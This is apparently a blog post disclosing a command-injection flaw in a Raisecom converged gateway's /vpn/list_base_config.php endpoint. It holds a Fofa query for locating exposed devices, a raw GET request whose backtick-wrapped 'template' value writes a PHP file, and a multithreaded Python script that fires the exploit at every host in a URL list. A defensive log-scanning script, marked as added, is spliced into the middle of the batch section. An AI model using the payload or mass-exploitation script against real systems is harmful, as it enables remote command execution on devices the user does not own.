I. Vulnerability Overview
The converged multi-service intelligent gateway is a new-generation voice-converged access network product that Raisecom offers to small and medium-sized enterprises and industry branch offices. It integrates data, voice, security and wireless functions and gives users a comprehensive, complete network access solution. The vulnerability is in the /vpn/list_base_config.php interface, which neither restricts nor validates the parameters submitted by the user; an attacker can use an interface parameter to write a PHP file and then request it, resulting in remote command execution.
(Disclaimer: any illegal attack carried out using this vulnerability has nothing to do with this blog; users bear the corresponding responsibility themselves!!!!)
II. Asset Discovery
Fofa:
body="/images/raisecom/back.gif" && title=="Web user login"
III. PoC
1. Write the PHP file:
GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Requesting /tmp/test.php afterwards confirms the vulnerability.
IV. Batch Verification Script
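From the defender's side, the request above leaves a distinctive trace in the gateway's web access log: a call to /vpn/list_base_config.php whose template parameter carries shell metacharacters, followed by a successful GET for a .php file under /tmp/. The following Python is an added example (not part of the original post) that scans access-log lines for both traces; the log lines are constructed here from the PoC request, and the Common Log Format layout is an assumption about how the device logs requests.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Common Log Format); not captured from a real device.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2024:10:00:01 +0000] "GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1" 200 512
10.0.0.5 - - [01/Aug/2024:10:00:02 +0000] "GET /tmp/test.php HTTP/1.1" 200 40210
192.168.1.7 - - [01/Aug/2024:10:05:00 +0000] "GET /vpn/list_base_config.php?type=mod&parts=base_config&template=default HTTP/1.1" 200 512
192.168.1.9 - - [01/Aug/2024:10:06:00 +0000] "GET /images/raisecom/back.gif HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell metacharacters that never belong in a legitimate template name.
SHELL_META = re.compile(r'[`;|$]')

def classify(line):
    """Return (client_ip, reason) when a log line matches one of the two traces, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path = url.path
    if path == "/vpn/list_base_config.php":
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("template", []):
            # parse_qs already decodes once; decode again to catch double-encoded payloads.
            if SHELL_META.search(unquote(value)):
                return (m.group("ip"), "shell metacharacters in template parameter")
    # A PHP file served from /tmp/ is the second half of the pattern: the dropped file being executed.
    if path.startswith("/tmp/") and path.endswith(".php") and m.group("status") == "200":
        return (m.group("ip"), "served PHP file from /tmp/ (possible dropped webshell)")
    return None

def scan(log_text):
    """Run classify() over every line and collect the findings in log order."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]

if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(f"{ip}: {reason}")
```

Blocking the template parameter at a reverse proxy or WAF until the device is patched, and alerting on any 200 response for /tmp/*.php, follow directly from the two checks.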
import requests
import urllib3
from requests import RequestException
from bs4 import BeautifulSoup
import threading

urllib3.disable_warnings()
result_list = []  # hosts confirmed vulnerable, collected by all threads

def poc(url):
    # Same request as the PoC above: the backtick-wrapped template value writes test.php into /www/tmp/
    Path = url.strip() + "/vpn/list_base_config.php?type=mod&parts=base_config&template=`echo -e '<?php phpinfo();unlink(__FILE__);?>'>/www/tmp/test.php`"
    Header = {
        "referer": "https://segmentfault.com/",
        "Sec-ch-ua": '"Not)A;Brand";v="99", " MicrosoftEdge";v="127", " Chromium";v="127"',
        "sec-ch-ua-mobile": "?0",
        "sec-ch-ua-platform": '"Windows"',
        "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0"
    }
    try:
        response = requests.get(url=Path, headers=Header, verify=False, timeout=3)
        if response.status_code == 200:
            try:
                # Fetch the written file and look for phpinfo() output to confirm execution
                file_check = requests.get(url=(url.strip() + "/tmp/test.php"), headers=Header, verify=False, timeout=3)
                soup = BeautifulSoup(file_check.content, 'html.parser')
                php_Extension = soup.find(string="PHP Extension")
                registered_Streams = soup.find(string="Registered PHP Streams")
                registered_Trans = soup.find(string="Registered Stream Socket Transports")
                if file_check.status_code == 200 and (php_Extension or registered_Trans or registered_Streams):
                    print(f"{url.strip()} is vulnerable: file write leading to RCE")
                    result_list.append(url.strip() + "\n")
            except RequestException:
                pass
    except RequestException:
        pass

def Mult_threading():
    # One thread per target URL read from url.txt
    threads = []
    with open("url.txt", 'r') as urls:
        for url in urls:
            Thread = threading.Thread(target=poc, args=(url,))
            threads.append(Thread)
            Thread.start()
    for i in threads:
        i.join()

if __name__ == '__main__':
    Mult_threading()
    with open("result.txt", 'w') as file:
        for i in result_list:
            file.write(i.strip() + "\n")